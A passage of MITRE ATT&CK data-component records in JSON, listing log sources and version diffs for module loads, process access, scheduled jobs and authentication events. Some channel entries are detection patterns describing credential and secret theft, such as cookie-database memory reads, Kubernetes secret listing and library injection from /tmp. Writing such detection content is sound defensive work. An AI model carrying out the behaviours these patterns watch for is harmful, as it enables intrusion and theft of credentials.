                    ],
                    "name": "Module Load",
                    "description": "When a process or program dynamically attaches a shared library, module, or plugin into its memory space. This action is typically performed to extend the functionality of an application, access shared system resources, or interact with kernel-mode components.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "Module",
                            "channel": "None"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=7"
                        },
                        {
                            "name": "ETW:LoadImage",
                            "channel": "provider: ETW LoadImage events for images from user-writable/UNC paths"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "openat/read/mmap: Open/mmap .so files from non-standard paths"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "select: Open files path LIKE '/tmp/%.so' OR '/dev/shm/%.so'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "dyld/unified log entries indicating image load from non-system paths"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "select: path LIKE '%/Library/%/*.dylib' OR '/tmp/*.dylib'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "dynamic loading of sleep-related functions or sandbox detection libraries"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "LD_PRELOAD Logging"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Dynamic Linking State"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "DYLD event subsystem"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Process linked with libcrypto.so making external connections"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process execution events with dylib load activity"
                        },
                        {
                            "name": "linux:Sysmon",
                            "channel": "EventCode=7"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "CLR Assembly creation, loading, or modification logs via MSSQL CLR integration"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process memory maps new dylib (dylib_load event)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Dylib loaded from abnormal location"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=3033"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=3063"
                        },
                        {
                            "name": "auditd:MMAP",
                            "channel": "load: Loading of libzip.so, libz.so, or libbz2.so by processes not normally associated with archiving"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Loading of libz.dylib, libarchive.dylib by non-standard applications"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "suspicious dlopen/dlsym usage in non-development processes"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Non-standard Office startup component detected (e.g., unexpected DLL path)"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "mmap"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "unexpected module load"
                        },
                        {
                            "name": "snmp:status",
                            "channel": "Status change in cryptographic hardware modules (enabled -> disabled)"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "module load"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "delay/sleep library usage in user context"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "kmod"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "subsystem=com.apple.kextd"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "loading of unexpected dylibs compared to historical baselines"
                        },
                        {
                            "name": "auditd:file-events",
                            "channel": "open of suspicious .so from non-standard paths"
                        },
                        {
                            "name": "macos:syslog",
                            "channel": "DYLD_INSERT_LIBRARIES anomalies"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "dmesg"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "ES_EVENT_TYPE_NOTIFY_KEXTLOAD"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "module load or memory map path"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launch and dylib load"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Processes linked with libssl/libcrypto performing network activity"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-ImageLoad",
                            "channel": "provider: Unsigned/user-writable image loads into msbuild.exe"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "DexClassLoader/PathClassLoader load attempt from non-standard path or recently created file"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Short burst of file I/O followed by JNI/dlopen of a newly created .so"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "dyld: dlopen/dyld_cache load from non-standard app-writable path"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "DexClassLoader/PathClassLoader loading from app-writable path OR reflective defineClass on byte[] payload"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "dlopen/image load from app-writable path (tmp, Caches) outside bundled resources"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "DexClassLoader|PathClassLoader load from app-writable path OR dlopen of a freshly created .so"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "3.0",
                    "x_mitre_domains": [
                        "ics-attack",
                        "enterprise-attack",
                        "mobile-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-29 17:21:27.873000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/data-components/DC0016\", \"old_value\": \"https://attack.mitre.org/datacomponents/DC0016\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][39]\": {\"name\": \"android:logcat\", \"channel\": \"DexClassLoader/PathClassLoader load attempt from non-standard path or recently created file\"}, \"root['x_mitre_log_sources'][40]\": {\"name\": \"android:logcat\", \"channel\": \"Short burst of file I/O followed by JNI/dlopen of a newly created .so\"}, \"root['x_mitre_log_sources'][41]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"dyld: dlopen/dyld_cache load from non-standard app-writable path\"}, \"root['x_mitre_log_sources'][42]\": {\"name\": \"android:logcat\", \"channel\": \"DexClassLoader/PathClassLoader loading from app-writable path OR reflective defineClass on byte[] payload\"}, \"root['x_mitre_log_sources'][43]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"dlopen/image load from app-writable path (tmp, Caches) outside bundled resources\"}, \"root['x_mitre_log_sources'][44]\": {\"name\": \"android:logcat\", \"channel\": \"DexClassLoader|PathClassLoader load from app-writable path OR dlopen of a freshly created .so\"}, \"root['x_mitre_domains'][2]\": \"mobile-attack\"}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 3.0"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.272000+00:00",
                    "modified": "2026-02-23 18:45:08.713000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/data-components/DC0035",
                            "external_id": "DC0035"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Process Access",
                    "description": "Refers to an event where one process attempts to open another process, typically to inspect or manipulate its memory, access handles, or modify execution flow. Monitoring these access attempts can provide valuable insight into both benign and malicious behaviors, such as debugging, inter-process communication (IPC), or process injection.\n\n*Data Collection Measures:*\n\n- Endpoint Detection and Response (EDR) Tools:\n    -  EDR solutions that provide telemetry on inter-process access and memory manipulation.\n- Sysmon (Windows):\n    - Event ID 10: Captures process access attempts, including:\n        - Source process (initiator)\n        - Target process (victim)\n        - Access rights requested\n        - Process ID correlation\n- Windows Event Logs:\n    - Event ID 4656 (Audit Handle to an Object): Logs access attempts to system objects.\n    - Event ID 4690 (Attempted Process Modification): Can help identify unauthorized process changes.\n- Linux/macOS Monitoring:\n    - AuditD: Monitors process access through syscall tracing (e.g., `ptrace`, `open`, `read`, `write`).\n    - eBPF/XDP: Used for low-level monitoring of kernel process access.\n    - OSQuery: Query process access behavior via structured SQL-like logging.\n- Procmon (Process Monitor) and Debugging Tools:\n    - Windows Procmon: Captures real-time process interactions.\n    - Linux strace / ptrace: Useful for tracking process behavior at the system call level.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=10"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Process State"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "ptrace attach"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "ptrace or task_for_pid"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "process_open"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "High frequency of accept(), read(), or SSL_read() syscalls tied to nginx/apache processes"
                        },
                        {
                            "name": "Apple TCC Logs",
                            "channel": "Microphone Access Events"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "ptrace"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "syscalls (open, read, ioctl) on /dev/input or /proc/*/fd/*"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=25"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "ES_EVENT_TYPE_NOTIFY_OPEN"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Unexpected NSXPCConnection calls by non-Apple-signed or abnormal binaries"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4663, 4670, 4656"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Unusual Mach port registration or access attempts between unrelated processes"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "subsystem=com.apple.security, library=libsystem_kernel.dylib"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "ptrace syscall or access to /proc/*/mem"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "vm_read, task_for_pid, or file open to cookie databases"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "process_events"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "ACCESS"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve, fork, mmap, ptrace"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "ptrace or process_vm_readv"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "unexpected memory inspection"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Code signing validation events referencing newly written local Mach-O/bundle prior to exec or dlopen"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Runtime grant or manifest presence for MANAGE_EXTERNAL_STORAGE/READ_EXTERNAL_STORAGE/READ_MEDIA_*; legacy external storage mode detection"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Privacy (TCC) prompts/grants for Photos/Files or access changes indicating new visibility into user/app data"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Activity/Process state change (mFocusedApp, onResume/onPause) identifying <pkg> as foreground"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Foreground/background transition for <bundle_id> to contextualize access timing"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Grant/activation of BIND_ACCESSIBILITY_SERVICE, BIND_INPUT_METHOD, SYSTEM_ALERT_WINDOW, POST_NOTIFICATIONS for <pkg>"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Keyboard extension Full Access change; privacy grant touching input/keyboard categories for <bundle_id>"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Grant/enablement for BIND_ACCESSIBILITY_SERVICE or BIND_INPUT_METHOD for <pkg>"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Keyboard extension Full Access change or related privacy grant for <bundle_id>"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Grant/enablement of SYSTEM_ALERT_WINDOW, BIND_ACCESSIBILITY_SERVICE, POST_NOTIFICATIONS for <pkg>"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Scene/foreground transitions for <bundle_id> to contextualize timing"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Reads/queries ops for PACKAGE_USAGE_STATS, QUERY_ALL_PACKAGES, BIND_DEVICE_ADMIN, BIND_VPN_SERVICE"
                        },
                        {
                            "name": "EDR:telemetry",
                            "channel": "Sustained or high-frequency location sensor access, including background location usage"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "3.0",
                    "x_mitre_domains": [
                        "enterprise-attack",
                        "mobile-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-02-23 18:45:08.713000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/data-components/DC0035\", \"old_value\": \"https://attack.mitre.org/datacomponents/DC0035\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][22]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Code signing validation events referencing newly written local Mach-O/bundle prior to exec or dlopen\"}, \"root['x_mitre_log_sources'][23]\": {\"name\": \"android:logcat\", \"channel\": \"Runtime grant or manifest presence for MANAGE_EXTERNAL_STORAGE/READ_EXTERNAL_STORAGE/READ_MEDIA_*; legacy external storage mode detection\"}, \"root['x_mitre_log_sources'][24]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Privacy (TCC) prompts/grants for Photos/Files or access changes indicating new visibility into user/app data\"}, \"root['x_mitre_log_sources'][25]\": {\"name\": \"android:logcat\", \"channel\": \"Activity/Process state change (mFocusedApp, onResume/onPause) identifying <pkg> as foreground\"}, \"root['x_mitre_log_sources'][26]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Foreground/background transition for <bundle_id> to contextualize access timing\"}, \"root['x_mitre_log_sources'][27]\": {\"name\": \"android:logcat\", \"channel\": \"Grant/activation of BIND_ACCESSIBILITY_SERVICE, BIND_INPUT_METHOD, SYSTEM_ALERT_WINDOW, POST_NOTIFICATIONS for <pkg>\"}, \"root['x_mitre_log_sources'][28]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Keyboard extension Full Access change; privacy grant touching input/keyboard categories for <bundle_id>\"}, \"root['x_mitre_log_sources'][29]\": {\"name\": \"android:logcat\", \"channel\": \"Grant/enablement for BIND_ACCESSIBILITY_SERVICE or BIND_INPUT_METHOD for <pkg>\"}, \"root['x_mitre_log_sources'][30]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Keyboard extension Full Access change or related privacy grant for <bundle_id>\"}, \"root['x_mitre_log_sources'][31]\": {\"name\": \"android:logcat\", \"channel\": \"Grant/enablement of SYSTEM_ALERT_WINDOW, BIND_ACCESSIBILITY_SERVICE, POST_NOTIFICATIONS for <pkg>\"}, \"root['x_mitre_log_sources'][32]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Scene/foreground transitions for <bundle_id> to contextualize timing\"}, \"root['x_mitre_log_sources'][33]\": {\"name\": \"android:logcat\", \"channel\": \"Reads/queries ops for PACKAGE_USAGE_STATS, QUERY_ALL_PACKAGES, BIND_DEVICE_ADMIN, BIND_VPN_SERVICE\"}, \"root['x_mitre_log_sources'][34]\": {\"name\": \"EDR:telemetry\", \"channel\": \"Sustained or high-frequency location sensor access, including background location usage\"}, \"root['x_mitre_domains'][1]\": \"mobile-attack\"}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 3.0"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--f42df6f0-6395-4f0c-9376-525a031f00c3",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.271000+00:00",
                    "modified": "2026-04-09 17:05:23.355000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/data-components/DC0001",
                            "external_id": "DC0001"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Scheduled Job Creation",
                    "description": "The establishment of a task or job that will execute at a predefined time or based on specific triggers.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "Scheduled Job",
                            "channel": "None"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4698"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Execution of non-standard script or binary by cron"
                        },
                        {
                            "name": "WinEventLog:TaskScheduler",
                            "channel": "EventCode=106"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "crontab, systemd_timers"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "launchd_jobs"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "Startup script and task execution logs"
                        },
                        {
                            "name": "kubernetes:apiserver",
                            "channel": "verb=create, resource=cronjobs, group=batch"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "file_events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process: crontab edits, launch of cron job"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "file_events - cron, launchd"
                        },
                        {
                            "name": "esxi:cron",
                            "channel": "execution of scheduled job"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "task creation events"
                        },
                        {
                            "name": "macos:cron",
                            "channel": "cron/launchd"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4699"
                        },
                        {
                            "name": "linux:cron",
                            "channel": "Scheduled execution of unknown or unusual script/binary"
                        },
                        {
                            "name": "MobiledEDR:telemetry",
                            "channel": "Scheduled task execution creates cache, staged payload, local output, or collected data artifact immediately after wake or job trigger"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "3.0",
                    "x_mitre_domains": [
                        "ics-attack",
                        "enterprise-attack",
                        "mobile-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-09 17:05:23.355000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/data-components/DC0001\", \"old_value\": \"https://attack.mitre.org/datacomponents/DC0001\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][16]\": {\"name\": \"MobiledEDR:telemetry\", \"channel\": \"Scheduled task execution creates cache, staged payload, local output, or collected data artifact immediately after wake or job trigger\"}, \"root['x_mitre_domains'][2]\": \"mobile-attack\"}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 3.0"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.271000+00:00",
                    "modified": "2026-04-24 19:47:33.610000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0002",
                            "external_id": "DC0002"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "User Account Authentication",
                    "description": "An attempt (successful and failed login attempts) by a user, service, or application to gain access to a network, system, or cloud-based resource. This typically involves credentials such as passwords, tokens, multi-factor authentication (MFA), or biometric validation.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "auditd:AUTH",
                            "channel": "pam_unix or pam_google_authenticator invoked repeatedly within short interval"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "pam_authenticate, sshd"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execution of ssh, scp, or sftp using previously unseen credentials or keys"
                        },
                        {
                            "name": "auditd:USER_LOGIN",
                            "channel": "USER_AUTH"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "AssumeRole or ConsoleLogin with repeated MFA failures followed by repeated MFA requests"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "sts:GetFederationToken"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "AssumeRoleWithWebIdentity"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "AWS IAM: ListUsers, ListRoles"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "eventName=ConsoleLogin | eventType=AwsConsoleSignIn"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "ConsoleLogin or AssumeRole"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "ConsoleLogin, AssumeRole, ListAccessKeys, CreateUser"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Success logs from high-risk accounts"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Multiple MFA challenge requests without successful primary login"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "TokenIssued, TokenRenewed: Unexpected or anomalous token issuance events"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "SignIn: Sign-ins flagged as atypical (new geographic region, unfamiliar device id) shortly after correlated endpoint/browser compromise times"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Operation=UserLogin"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Unusual Token Usage or Application Consent"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "OperationName=SetDomainAuthentication OR Set-FederatedDomain"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Sign-in with unfamiliar location/device + portal navigation"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Login from newly created account"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Interactive/Non-Interactive Sign-In"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Reset password or download key from portal"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "status = failure"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Sign-in logs"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "SigninSuccess"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Failure Reason + UserPrincipalName"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Sign-in activity"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Sign-in logs / audit events"
                        },
                        {
                            "name": "esxi:auth",
                            "channel": "interactive shell or SSH access preceding storage enumeration"
                        },
                        {
                            "name": "esxi:auth",
                            "channel": "/var/log/auth.log"
                        },
                        {
                            "name": "esxi:auth",
                            "channel": "SSH session/login"
                        },
                        {
                            "name": "esxi:vpxa",
                            "channel": "user login from unexpected IP or non-admin user role"
                        },
                        {
                            "name": "esxi:vpxd",
                            "channel": "/var/log/vmware/vpxd.log"
                        },
                        {
                            "name": "ESXiLogs:authlog",
                            "channel": "Unexpected login followed by encoding commands"
                        },
                        {
                            "name": "gcp:audit",
                            "channel": "drive.activity"
                        },
                        {
                            "name": "gcp:audit",
                            "channel": "login.event"
                        },
                        {
                            "name": "gcp:audit",
                            "channel": "Sign-in logs / audit events"
                        },
                        {
                            "name": "gcp:workspaceaudit",
                            "channel": "Token Generation via Domain Delegation"
                        },
                        {
                            "name": "GCPAuditLogs:login.googleapis.com",
                            "channel": "Failed sign-in events"
                        },
                        {
                            "name": "kubernetes:apiserver",
                            "channel": "get/list requests to /api/v1/secrets or /api/v1/namespaces/*/serviceaccounts"
                        },
                        {
                            "name": "kubernetes:apiserver",
                            "channel": "authentication.k8s.io/v1beta1"
                        },
                        {
                            "name": "kubernetes:audit",
                            "channel": "Failed login"
                        },
                        {
                            "name": "kubernetes:audit",
                            "channel": "authentication.k8s.io"
                        },
                        {
                            "name": "linux:auth",
                            "channel": "sshd login"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "sudo/date/timedatectl execution by non-standard users"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "SSH failed login"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Failed password for invalid user"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "sshd[pid]: Failed password"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "authentication and authorization events during environmental validation phase"
                        },
                        {
                            "name": "m365:exchange",
                            "channel": "Logon failure"
                        },
                        {
                            "name": "m365:exchange",
                            "channel": "FailedLogin"
                        },
                        {
                            "name": "m365:signinlogs",
                            "channel": "Sign-in from anomalous location or impossible travel condition"
                        },
                        {
                            "name": "m365:signinlogs",
                            "channel": "UserLoginSuccess"
                        },
                        {
                            "name": "m365:signinlogs",
                            "channel": "Unusual sign-in from service principal to user mailbox"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Delegated permission grants without user login event"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "login using refresh_token with no preceding authentication context"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Sign-in logs"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "successful sudo or authentication for account not normally associated with admin actions"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Login success without MFA step"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log show --predicate 'eventMessage contains \"Authentication\"'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "User credential prompt events without associated trusted installer package"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Login failure / authorization denied"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "auth"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Login Window and Authd errors"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "authd"
                        },
                        {
                            "name": "network:auth",
                            "channel": "repeated successful authentications with previously unknown accounts or anomalous password acceptance"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "config access, authentication logs"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "User privilege escalation to level 15/root prior to destructive commands"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "authorization/accounting logs"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Failed and successful logins to network devices outside approved admin IP ranges"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Privileged login followed by destructive format command"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "admin login events"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Privileged login followed by destructive command sequence"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "AAA, RADIUS, or TACACS authentication"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "authentication logs"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "AAA or TACACS authentication failures"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "authentication & authorization"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "login failed"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Accepted password or publickey for user from remote IP"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Repeated failed authentication attempts or replay patterns"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Successful login without expected MFA challenge"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "sshd or PAM logins"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "TGS-REQ and AS-REQ seen for new user shortly after domain-modifying process"
                        },
                        {
                            "name": "Okta:authn",
                            "channel": "authentication_failure"
                        },
                        {
                            "name": "Okta:SystemLog",
                            "channel": "eventType: user.authentication.sso, app.oauth2.token.grant"
                        },
                        {
                            "name": "saas-app:auth",
                            "channel": "login_failure"
                        },
                        {
                            "name": "saas:audit",
                            "channel": "Repeated requests to SMS-generating endpoints using anomalous or new user agents, IP ranges, or geographies."
                        },
                        {
                            "name": "saas:auth",
                            "channel": "signin_failed"
                        },
                        {
                            "name": "saas:googleworkspace",
                            "channel": "API access without user login"
                        },
                        {
                            "name": "saas:googleworkspace",
                            "channel": "Accessed third-party credential management service"
                        },
                        {
                            "name": "saas:googleworkspace",
                            "channel": "login with reused session token and mismatched user agent or IP"
                        },
                        {
                            "name": "saas:googleworkspace",
                            "channel": "Access via OAuth credentials with unusual scopes or from anomalous IPs"
                        },
                        {
                            "name": "saas:MDM",
                            "channel": "Authentication events to device management or enterprise mobility management consoles"
                        },
                        {
                            "name": "saas:MDM",
                            "channel": "Authentication events to Apple iCloud or enterprise device management services"
                        },
                        {
                            "name": "saas:okta",
                            "channel": "session.impersonation.start"
                        },
                        {
                            "name": "saas:okta",
                            "channel": "Unusual OAuth app requesting message-read scopes for Slack/Teams/Jira"
                        },
                        {
                            "name": "saas:okta",
                            "channel": "authentication_failure"
                        },
                        {
                            "name": "saas:okta",
                            "channel": "Sign-in logs / audit events"
                        },
                        {
                            "name": "saas:okta",
                            "channel": "user.account.reset_password; user.mfa.factor.activate; app.oauth2.authorize"
                        },
                        {
                            "name": "saas:salesforce",
                            "channel": "API login using access_token without login history"
                        },
                        {
                            "name": "saas:salesforce",
                            "channel": "Login"
                        },
                        {
                            "name": "User Account",
                            "channel": "None"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4625"
                        },
                        {
                            "name": "WinEventLog:Security",
